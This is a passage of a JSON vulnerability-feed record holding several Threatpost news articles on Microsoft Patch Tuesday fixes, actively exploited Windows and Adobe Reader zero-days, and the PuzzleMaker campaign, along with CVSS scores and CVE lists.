Server 2022 (and earlier versions 2008, 2012, 2016 and 2019) to attack.\n\n_[[**FREE On-demand Event**](<https://threatpost.com/webinars/securely-access-your-machines-from-anywhere-presented-by-keeper-security/>): **Join Keeper Security\u2019s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office.** **[WATCH HERE](<https://threatpost.com/webinars/securely-access-your-machines-from-anywhere-presented-by-keeper-security/>)**.]_\n\nThe CSRSS bug is an elevation of privileges vulnerability that allows adversaries with a pre-established foothold on a targeted system to execute code as an unprivileged user. When the bug was first reported by Microsoft\u2019s own security team earlier this month it was classified as a zero-day, or a known bug with no patch. That patch was made available on [Tuesday July 5](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22047>).\n\nResearchers at FortiGuard Labs, a division of Fortinet, said the threat the bug poses to business is \u201cmedium\u201d. [In a bulletin, researchers explain](<https://www.fortiguard.com/threat-signal-report/4671/known-active-exploitation-of-windows-csrss-elevation-of-privilege-vulnerability-cve-2022-22047>) the downgraded rating because an adversary needs advanced \u201clocal\u201d or physical access to the targeted system to exploit the bug and a patch is available.\n\nThat said, an attacker who has previously gained remote access to a computer system (via malware infection) could exploit the vulnerability remotely.\n\n\u201cAlthough there is no further information on exploitation released by Microsoft, it can be surmised that an unknown remote code execution allowed for an attacker to perform lateral movement and escalate privileges on machines vulnerable to CVE-2022-22047, ultimately allowing for SYSTEM privileges,\u201d FortiGuard Labs wrote.\n\n## Office and Adobe Documents Entry Points\n\nWhile the vulnerability is being actively exploited, there are no known public proof of concept exploits in the wild that can be used to help mitigate or sometimes fuel attacks, according to a [report by The Record](<https://therecord.media/cisa-adds-windows-bug-to-exploited-list-urges-agencies-to-patch-by-august-2/>).\n\n\u201cThe vulnerability allows an attacker to execute code as SYSTEM, provided they can execute other code on the target,\u201d wrote Trend Micro\u2019s [Zero Day Initiative (ZDI) in its Patch Tuesday](<https://www.zerodayinitiative.com/blog/2022/7/12/the-july-2022-security-update-review>) roundup last week.\n\n\u201cBugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which is why so many were disheartened to hear Microsoft\u2019s delay in blocking all Office macros by default,\u201d wrote ZDI author Dustin Childs.\n\nMicrosoft recently said it would block the use of Visual Basic for Applications (VBA) macros by default in some of its Office apps, however set no timeline enforce the policy.\n\nCISA [added the Microsoft bug to its running list](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) of known exploited vulnerabilities on July 7 (search \u201cCVE-2022-22047\u201d to find the entry) and recommends simply, \u201capply updates per vendor instructions\u201d.\n\n_[[**FREE On-demand Event**](<https://threatpost.com/webinars/securely-access-your-machines-from-anywhere-presented-by-keeper-security/>): **Join Keeper Security\u2019s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office.** **[WATCH HERE](<https://threatpost.com/webinars/securely-access-your-machines-from-anywhere-presented-by-keeper-security/>)**.]_\n\nImage: Courtesy of Microsoft\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-18T12:19:26", "type": "threatpost", "title": "CISA Urges Patch of Exploited Windows 11 Bug by Aug. 2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-18T12:19:26", "id": "THREATPOST:781705ADC10B0D40FC4B8D835FA5EA6D", "href": "https://threatpost.com/cisa-urges-patch-11-bug/180235/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-08T22:18:00", "description": "Microsoft jumped on 50 vulnerabilities in this month\u2019s [Patch Tuesday update](<https://msrc.microsoft.com/update-guide>), issuing fixes for CVEs in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code \u2013 Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.\n\nFive of the CVEs are rated Critical and 45 are rated Important in severity. Microsoft reported that six of the bugs are currently under active attack, while three are publicly known at the time of release.\n\nThe number might seem light \u2013 it represents six fewer patches than Microsoft [released in May](<https://threatpost.com/wormable-windows-bug-dos-rce/166057/>) \u2013 but the number of critical vulnerabilities ticked up to five month-over-month.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThose actively exploited vulnerabilities can enable an attacker to hijack a system. They have no workarounds, so some security experts are recommending that they be patched as the highest priority.\n\nThe six CVEs under active attack in the wild include four elevation of privilege vulnerabilities, one information disclosure vulnerability and one remote code execution (RCE) vulnerability.\n\n## Critical Bugs of Note\n\n[CVE-2021-31985](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31985>) is a critical RCE vulnerability in Microsoft\u2019s Defender antimalware software that should grab attention. A similar, critical bug in Defender was [patched in January](<https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/>). The most serious of the year\u2019s first Patch Tuesday, that earlier Defender bug was an RCE vulnerability that came under active exploit.\n\nAnother critical flaw is [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31963>), a Microsoft SharePoint Server RCE vulnerability. Jay Goodman, director of product marketing at Automox, said in a [blog post](<https://blog.automox.com/automox-experts-weigh-in-june-patch-tuesday-2021>) that an attacker exploiting this vulnerability \u201ccould take control of a system where they would be free to install programs, view or change data, or create new accounts on the target system with full user rights.\u201d \nWhile Microsoft reports that this vulnerability is less likely to be exploited,Goodman suggested that organizations don\u2019t let it slide: \u201cPatching critical vulnerabilities in the 72-hour window before attackers can weaponize is an important first step to maintaining a safe and secure infrastructure,\u201d he observed.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/08141612/Sophos-impact-chart-June-21-patch-Tuesday-e1623176186946.png>)\n\nA year-to-date summary of 2021 Microsoft vulnerability releases as of June. Source: Sophos\n\n## Bugs Exploited in the Wild\n\nMicrosoft fixed a total of seven zero-day vulnerabilities. One was [CVE-2021-31968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968>), Windows Remote Desktop Services Denial of Service Vulnerability that was publicly disclosed but hasn\u2019t been seen in attacks. It was issued a CVSS score of 7.5.\n\nThese are the six flaws that MIcrosoft said are under active attack, all of them also zero days.\n\n * [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) \u2013 Windows Kernel Information Disclosure Vulnerability. Rating: Important. CVSS 5.5\n * [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) \u2013 Windows NTFS Elevation of Privilege Vulnerability. Rating: Important. CVSS 7.8\n * [CVE-2021-33739](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) \u2013 Microsoft DWM Core Library Elevation of Privilege Vulnerability. Rating: Important. CVSS 8.4\n * [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) \u2013 Windows MSHTML Platform Remote Code Execution Vulnerability. Rating: **Critical**. CVSS 7.5\n * [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2\n * [CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2\n\n## CVE-2021-33742\n\nThis RCE vulnerability exploits MSHTML, a component used by the Internet Explorer engine to read and display content from websites.The bug could allow an attacker to execute code on a target system if a user views specially crafted web content. The [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/6/8/the-june-2021-security-update-review>)\u2018s (ZDI\u2019s) Dustin Childs noted in his Patch Tuesday analysis that since the vulnerability is in the Trident (MSHTML) engine itself, many different applications are affected, not just Internet Explorer. \u201cIt\u2019s not clear how widespread the active attacks are, but considering the vulnerability impacts all supported Windows versions, this should be at the top of your test and deploy list,\u201d he recommended.\n\nThe vulnerability doesn\u2019t require special privilege to exploit, though the attack complexity is high, if that\u2019s any consolation. An attacker would need to do some extra legwork to pull it off, noted Satnam Narang, staff research engineer at Tenable, in an email to Threatpost on Tuesday.\n\nImmersive Labs\u2019 Kevin Breen, director of cyber threat research, noted that visiting a website in a vulnerable browser is \u201ca simple way for attackers to deliver this exploit.\u201d He told Threatpost via email on Tuesday that since the library is used by other services and applications, \u201cemailing HTML files as part of a phishing campaign is also a viable method of delivery.\u201d\n\n[Sophos decreed](<https://news.sophos.com/en-us/2021/06/08/six-in-the-wild-exploits-patched-in-microsofts-june-security-fix-release/>) this one to be the top concern of this month\u2019s crop, given that it\u2019s already being actively exploited by malicious actors.\n\n## CVE-2021-31955, CVE-2021-31956: Used in PuzzleMaker Targeted Malware\n\nCVE-2021-31955 is an information disclosure vulnerability in the Windows Kernel, while CVE-2021-31956 is an elevation of privilege vulnerability in Windows NTFS. The ZDI\u2019s Childs noted that CVE-2021-31956 was reported by the same researcher who found CVE-2021-31955, an information disclosure bug also listed as under active attack. They could be linked, he suggested: \u201cIt\u2019s possible these bugs were used in conjunction, as that is a common technique \u2013 use a memory leak to get the address needed to escalate privileges. These bugs are important on their own and could be even worse when combined. Definitely prioritize the testing and deployment of these patches.\u201d\n\nHe was spot-on. On Tuesday, Kaspersky announced that its researchers had discovered a highly targeted malware campaign launched in April against multiple companies, in which a previously unknown threat actor used a chain of Chrome and Windows zero-day exploits: Namely, these two.\n\nIn a press release, Kaspersky said that one of the exploits was used for RCE in the Google Chrome web browser, while the other was an elevation of privilege exploit fine-tuned to target \u201cthe latest and most prominent builds\u201d of Windows 10.\n\n\u201cRecent months have seen a wave of advanced threat activity exploiting zero-days in the wild,\u201d according to the release. \u201cIn mid-April, Kaspersky experts discovered yet a new series of highly targeted exploit attacks against multiple companies that allowed the attackers to stealthily compromise the targeted networks.\u201d\n\nKaspersky hasn\u2019t yet found a connection between these attacks and any known threat actors, so it\u2019s gone ahead and dubbed the actor PuzzleMaker. It said that all the attacks were conducted through Chrome and used an exploit that allowed for RCE. Kaspersky researchers weren\u2019t able to retrieve the code for the exploit, but the timeline and availability suggests the attackers were using the now-patched [CVE-2021-21224](<https://www.cvedetails.com/cve/CVE-2021-21224>) vulnerability in Chrome and Chromium browsers that allows attackers to exploit the Chrome renderer process (the processes that are responsible for what happens inside users\u2019 tabs).\n\nKaspersky experts did find and analyze the second exploit, however: An elevation of privilege exploit that exploits two distinct vulnerabilities in the Microsoft Windows OS kernel: CVE-2021-31955 and CVE-2021-31956. The CVE-2021-31955 bug \u201cis affiliated with SuperFetch, a feature first introduced in Windows Vista that aims to reduce software loading times by pre-loading commonly used applications into memory,\u201d they explained.\n\nThe second flaw, CVE-2021-31956, is an Elevation of Privilege vulnerability and heap-based buffer overflow. Kaspersky said that attackers used this vulnerability alongside Windows Notification Facility (WNF) \u201cto create arbitrary memory read/write primitives and execute malware modules with system privileges.\u201d\n\n\u201cOnce the attackers have used both the Chrome and Windows exploits to gain a foothold in the targeted system, the stager module downloads and executes a more complex malware dropper from a remote server,\u201d they continued. \u201cThis dropper then installs two executables, which pretend to be legitimate files belonging to Microsoft Windows OS. The second of these two executables is a remote shell module, which is able to download and upload files, create processes, sleep for certain periods of time, and delete itself from the infected system.\u201d\n\nBoris Larin, senior security researcher with Kaspersky\u2019s Global Research and Analysis Team (GReAT), said that the team hasn\u2019t been able to link these highly targeted attacks to any known threat actor: Hence the name PuzzleMaker and the determination to closely monitor the security landscape \u201cfor future activity or new insights about this group,\u201d he was quoted as saying in the press release.\n\nIf the current trend is any indication, expect to see more of the same, Larin said. \u201cOverall, of late, we\u2019ve been seeing several waves of high-profile threat activity being driven by zero-day exploits,\u201d he said. \u201cIt\u2019s a reminder that zero days continue to be the most effective method for infecting targets. Now that these vulnerabilities have been made publicly known, it\u2019s possible that we\u2019ll see an increase of their usage in attacks by this and other threat actors. That means it\u2019s very important for users to download the latest patch from Microsoft as soon as possible.\u201d\n\n## CVE-2021-31199/CVE-2021-31201\n\nThe two Enhanced Cryptographic Provider Elevation of Privilege vulnerabilities are linked to the Adobe Reader bug that [came under active attack](<https://threatpost.com/adobe-zero-day-bug-acrobat-reader/166044/>) last month (CVE-2021-28550), ZDI explained. \u201cIt\u2019s common to see privilege escalation paired with code execution bugs, and it seems these two vulnerabilities were the privilege escalation part of those exploits,\u201d he explained. \u201cIt is a bit unusual to see a delay between patch availability between the different parts of an active attack, but good to see these holes now getting closed.\u201d\n\n## CVE-2021-33739\n\nBreen noted that privilege escalation vulnerabilities such as this one in the Microsoft DWM Core Library are just as valuable to attackers as RCEs. \u201cOnce they have gained an initial foothold, they can move laterally across the network and uncover further ways to escalate to system or domain-level access,\u201d he said. \u201cThis can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook, ****_\u201c_**[**_2021: The Evolution of Ransomware_**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)**_,\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and **[**DOWNLOAD**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)** the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-06-08T21:45:12", "type": "threatpost", "title": "Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21224", "CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31963", "CVE-2021-31968", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-08T21:45:12", "id": "THREATPOST:61CC1EAC83030C2B053946454FE77AC3", "href": "https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-11T18:51:27", "description": "Adobe is warning customers of a critical zero-day bug actively exploited in the wild that affects its ubiquitous Adobe Acrobat PDF reader software. A patch is available, as part of the company\u2019s Tuesday roundup of 43 fixes for 12 of its products, including [Adobe Creative Cloud Desktop Application](<https://helpx.adobe.com/security/products/creative-cloud/apsb21-31.html>), [Illustrator](<https://helpx.adobe.com/security/products/illustrator/apsb21-24.html>), [InDesign](<https://helpx.adobe.com/security/products/indesign/apsb21-22.html>), and [Magento](<https://helpx.adobe.com/security/products/magento/apsb21-30.html>).\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS &amp; Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nAccording to Adobe, the zero-day vulnerability, which is tracked as [CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>), \u201chas been exploited in the wild in limited attacks targeting [Adobe Reader](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>) users on Windows.\u201d\n\nWindows users of Adobe Reader may be the only ones currently targeted. However, the bug affects eight versions of the software, including those running on Windows and macOS systems. Versions include:\n\n * Windows Acrobat DC &amp; Reader DC (versions 2021.001.20150 and earlier)\n * macOS Acrobat DC &amp; Reader DC (versions 2021.001.20149 and earlier)\n * Windows &amp; macOS Acrobat 2020 &amp; Acrobat Reader 2020 (2020.001.30020 and earlier versions)\n * Windows &amp; macOS Acrobat 2017 &amp; Acrobat Reader 2017 (2017.011.30194 and earlier versions)\n\nAdobe did not release technical specifics regarding the zero-day vulnerability. Typically, those details become available after users have had an opportunity to apply the fix. \u201cUsers can update their product installations manually by choosing Help &gt; Check for Updates,\u201d Adobe wrote in its [May security bulletin, posted Tuesday](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>).\n\n## **May Adobe Update Fixes Multiple Critical Bugs **\n\nAlso part of Tuesday\u2019s roundup of 43 fixes are several other bugs rated critical. In all, Adobe Acrobat received [10 critical and four important vulnerability patches](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>). Seven out of those bugs included arbitrary code execution bugs. Three (CVE-2021-21044, CVE-2021-21038, CVE-2021-21086) of the vulnerabilities patched on Tuesday open systems up to out-of-bounds write attacks.\n\nAdobe Illustrator received the next highest number of patches on Tuesday, with five critical code execution vulnerabilities fixed. According to Adobe\u2019s description of the flaws, three (CVE-2021-21103, CVE-2021-21104, CVE-2021-21105) are memory corruption bugs that open systems up to hackers, triggering arbitrary code execution on targeted systems. Kushal Arvind Shah, a bug hunter with Fortinet\u2019s FortiGuard Labs, is credited for the three memory corruption bugs.\n\nAdditional Adobe products receiving patches included [Adobe Animate](<https://helpx.adobe.com/security/products/animate/apsb21-35.html>), [Adobe Medium](<https://helpx.adobe.com/security/products/medium/apsb21-34.html>), [Adobe After Effects](<https://helpx.adobe.com/security/products/after_effects/apsb21-33.html>), [Adobe Media Encoder](<https://helpx.adobe.com/security/products/media-encoder/apsb21-32.html>), [Adobe Genuine Service](<https://helpx.adobe.com/security/products/integrity_service/apsb21-27.html>), [Adobe InCopy](<https://helpx.adobe.com/security/products/incopy/apsb21-25.html>) and [Adobe Genuine Service](<https://helpx.adobe.com/security/products/integrity_service/apsb21-27.html>).\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-05-11T18:38:36", "type": "threatpost", "title": "Hackers Leverage Adobe Zero-Day Bug Impacting Acrobat Reader", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-21103", "CVE-2021-21104", "CVE-2021-21105", "CVE-2021-28550"], "modified": "2021-05-11T18:38:36", "id": "THREATPOST:474207FB444B779CD6B86ABEA0D24054", "href": "https://threatpost.com/adobe-zero-day-bug-acrobat-reader/166044/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-11T19:56:07", "description": "Microsoft has patched 51 security vulnerabilities in its scheduled August Patch Tuesday update, including seven critical bugs, two issues that were publicly disclosed but unpatched until now, and one that\u2019s listed as a zero-day that has been exploited in the wild.\n\nOf note, there are 17 elevation-of-privilege (EoP) vulnerabilities, 13 remote code-execution (RCE) issues, eight information-disclosure flaws and two denial-of-service (DoS) bugs.\n\nThe update also includes patches for three more Print Spooler bugs, familiar from the PrintNightmare saga.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/>)\n\n\u201cFortunately, it was a lighter month than usual,\u201d said Eric Feldman, senior product marketing manager at Automox, in a [Patch Tuesday analysis](<https://blog.automox.com/automox-experts-weigh-in-august-patch-tuesday-2021>) from the vendor. \u201cThis represents a 56 percent reduction in overall vulnerabilities from July, and 33 percent fewer vulnerabilities on average for each month so far this year. We have also seen a similar reduction in critical vulnerabilities this month, with 30 percent less compared to the monthly average.\u201d\n\n## **Windows Critical Security Vulnerabilities**\n\nThe seven critical bugs [addressed in August](<https://msrc.microsoft.com/update-guide/>) are as follows:\n\n * CVE-2021-26424 \u2013 Windows TCP/IP RCE Vulnerability\n * CVE-2021-26432 \u2013 Windows Services for NFS ONCRPC XDR Driver RCE Vulnerability\n * CVE-2021-34480 \u2013 Scripting Engine Memory Corruption Vulnerability\n * CVE-2021-34530 \u2013 Windows Graphics Component RCE Vulnerability\n * CVE-2021-34534 \u2013 Windows MSHTML Platform RCE Vulnerability\n * CVE-2021-34535 \u2013 Remote Desktop Client RCE Vulnerability\n * CVE-2021-36936 \u2013 Windows Print Spooler RCE Vulnerability\n\nThe bug tracked as **CVE-2021-26424** exists in the TCP/IP protocol stack identified in Windows 7 and newer Microsoft operating systems, including servers.\n\n\u201cDespite its CVSS rating of 9.9, this may prove to be a trivial bug, but it\u2019s still fascinating,\u201d said Dustin Childs of Trend Micro\u2019s Zero Day Initiative (ZDI) in his [Tuesday analysis](<https://www.zerodayinitiative.com/blog/2021/8/10/the-august-2021-security-update-review>). \u201cAn attacker on a guest Hyper-V OS could execute code on the host Hyper-V server by sending a specially crafted IPv6 ping. This keeps it out of the wormable category. Still, a successful attack would allow the guest OS to completely take over the Hyper-V host. While not wormable, it\u2019s still cool to see new bugs in new scenarios being found in protocols that have been around for years.\u201d\n\nThe next bug, **CVE-2021-26432** in Windows Services, is more likely to be exploited given its low complexity status, according to Microsoft\u2019s advisory; it doesn\u2019t require privileges or user interaction to exploit, but Microsoft offered no further details.\n\n\u201cThis may fall into the \u2018wormable\u2019 category, at least between servers with NFS installed, especially since the open network computing remote procedure call (ONCRPC) consists of an External Data Representation (XDR) runtime built on the Winsock Kernel (WSK) interface,\u201d Childs said. \u201cThat certainly sounds like elevated code on a listening network service. Don\u2019t ignore this patch.\u201d\n\nAleks Haugom, product marketing manager at Automox, added, \u201cExploitation results in total loss of confidentiality across all devices managed by the same security authority. Furthermore, attackers can utilize it for denial-of-service attacks or to maliciously modify files. So far, no further details have been divulged by Microsoft or the security researcher (Liubenjin from Codesafe Team of Legendsec at Qi\u2019anxin Group) that discovered this vulnerability. Given the broad potential impact, its label \u2018Exploitation More Likely\u2019 and apparent secrecy, patching should be completed ASAP.\u201d\n\nMeanwhile, the memory-corruption bug (**CVE-2021-34480**) arises from how the scripting engine handles objects in memory, and it also allows RCE. Using a web-based attack or a malicious file, such as a malicious landing page or phishing email, attackers can use this vulnerability to take control of an affected system, install programs, view or change data, or create new user accounts with full user rights.\n\n\u201cCVE-2021-34480 should also be a priority,\u201d Kevin Breen, director of cyber-threat research at Immersive Labs, told Threatpost. \u201cIt is a low score in terms of CVSS, coming in at 6.8, but has been marked by Microsoft as \u2018Exploitation More Likely\u2019 because it is the type of attack commonly used to increase the success rate of spear phishing attacks to gain network access. Simple, but effective.\u201d\n\nThe Windows Graphic Component bug (**CVE-2021-34530**) allows attackers to remotely execute malicious code in the context of the current user, according to Microsoft \u2013 if they can social-engineer a target into opening a specially crafted file.\n\nAnother bug exists in the Windows MSHTML platform, also known as Trident (**CVE-2021-34534**). Trident is the rendering engine (mshtml.dll) used by Internet Explorer. The bug affects many Windows 10 versions (1607, 1809,1909, 2004, 20H2, 21H1) as well as Windows Server 2016 and 2019.\n\nBut while it potentially affects a large number of users, exploitation is not trivial.\n\n\u201cTo exploit, a threat actor would need to pull off a highly complex attack with user interaction \u2013 still entirely possible with the sophisticated attackers of today,\u201d said Peter Pflaster, technical product marketing manager at Automox.\n\nThe bug tracked as **CVE-2021-34535** impacts the Microsoft Remote Desktop Client, Microsoft\u2019s nearly ubiquitous utility for connecting to remote PCs.\n\n\u201cWith today\u2019s highly dispersed workforce, CVE-2021-34535, an RCE vulnerability in Remote Desktop Clients, should be a priority patch,\u201d said Breen. \u201cAttackers increasingly use RDP access as the tip of the spear to gain network access, often combining it with privilege escalation to move laterally. These can be powerful as, depending on the method, it may allow the attacker to authenticate in the network in the same way a user would, making detection difficult.\u201d\n\nIt\u2019s not as dangerous of a bug [as BlueKeep,](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) according to Childs, which also affected RDP.\n\n\u201cBefore you start having flashbacks to BlueKeep, this bug affects the RDP client and not the RDP server,\u201d he said. \u201cHowever, the CVSS 9.9 bug is nothing to ignore. An attacker can take over a system if they can convince an affected RDP client to connect to an RDP server they control. On Hyper-V servers, a malicious program running in a guest VM could trigger guest-to-host RCE by exploiting this vulnerability in the Hyper-V Viewer. This is the more likely scenario and the reason you should test and deploy this patch quickly.\u201d\n\n## **Windows Print Spooler Bugs \u2013 Again**\n\nThe final critical bug is **CVE-2021-36936**, a Windows Print Spooler RCE bug that\u2019s listed as publicly known.\n\nPrint Spooler made headlines last month, when Microsoft patched what it thought was a minor elevation-of-privilege vulnerability in the service (CVE-2021-1675). But the listing was updated later in the week, after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE \u2013 [requiring a new patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>).\n\nIt also disclosed a second bug, similar to PrintNightmare (CVE-2021-34527); and a third, [an EoP issue](<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>) ([CVE-2021-34481](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>)).\n\n\u201cAnother month, another remote code-execution bug in the Print Spooler,\u201d said ZDI\u2019s Childs. \u201cThis bug is listed as publicly known, but it\u2019s not clear if this bug is a variant of PrintNightmare or a unique vulnerability all on its own. There are quite a few print-spooler bugs to keep track of. Either way, attackers can use this to execute code on affected systems. Microsoft does state low privileges are required, so that should put this in the non-wormable category, but you should still prioritize testing and deployment of this critical-rated bug.\u201d\n\nThe critical vulnerability is just one of three Print Spooler issues in the August Patch Tuesday release.\n\n\u201cThe specter of the PrintNightmare continues to haunt this patch Tuesday with three more print spooler vulnerabilities, CVE-2021-36947, CVE-2021-36936 and CVE-2021-34481,\u201d said Breen. \u201cAll three are listed as RCE over the network, requiring a low level of access, similar to PrintNightmare. Microsoft has marked these as \u2018Exploitation More Likely\u2019 which, if the previous speed of POC code being published is anything to go by, is certainly true.\u201d\n\n## **RCE Zero-Day in Windows Update Medic Service **\n\nThe actively exploited bug is tracked as **CVE-2021-36948** and is rated as important; it could pave the way for RCE via the Windows Update Medic Service in Windows 10 and Server 2019 and newer operating systems.\n\n\u201cUpdate Medic is a new service that allows users to repair Windows Update components from a damaged state such that the device can continue to receive updates,\u201d Automox\u2019 Jay Goodman explained. \u201cThe exploit is both low complexity and can be exploited without user interaction, making this an easy vulnerability to include in an adversary\u2019s toolbox.\u201d\n\nImmersive\u2019s Breen added, \u201cCVE-2021-36948 is a privilege-escalation vulnerability \u2013 the cornerstone of modern intrusions as they allow attackers the level of access to do things like hide their tracks and create user accounts. In the case of ransomware attacks, they have also been used to ensure maximum damage.\u201d\n\nThough the bug is being reported as being exploited in the wild by Microsoft, activity appears to remain limited or targeted: \u201cWe have seen no evidence of it at Kenna Security at this time,\u201d Jerry Gamblin, director of security research at Kenna Security (now part of Cisco) told Threatpost.\n\n## **Publicly Known Windows LSA Spoofing Bug**\n\nThe second publicly known bug (after the Print Spooler issue covered earlier) is tracked as **CVE-2021-36942**, and it\u2019s an important-rated Windows LSA (Local Security Authority) spoofing vulnerability.\n\n\u201cIt fixes a flaw that could be used to steal NTLM hashes from a domain controller or other vulnerable host,\u201d Immersive\u2019s Breen said. \u201cThese types of attacks are well known for lateral movement and privilege escalation, as has been demonstrated recently by a [new exploit called PetitPotam](<https://threatpost.com/microsoft-petitpotam-poc/168163/>). It is a post-intrusion exploit \u2013 further down the attack chain \u2013 but still a useful tool for attackers.\u201d\n\nChilds offered a bit of context around the bug.\n\n\u201cMicrosoft released this patch to further protect against NTLM relay attacks by issuing this update to block the LSARPC interface,\u201d he said. \u201cThis will impact some systems, notably Windows Server 2008 SP2, that use the EFS API OpenEncryptedFileRawA function. You should apply this to your Domain Controllers first and follow the additional guidance in [ADV210003](<https://msrc.microsoft.com/update-guide/vulnerability/ADV210003>) and [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>). This has been an ongoing issue since 2009, and, likely, this isn\u2019t the last we\u2019ll hear of this persistent issue.\u201d\n\nMicrosoft\u2019s next Patch Tuesday will fall on September 14.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and 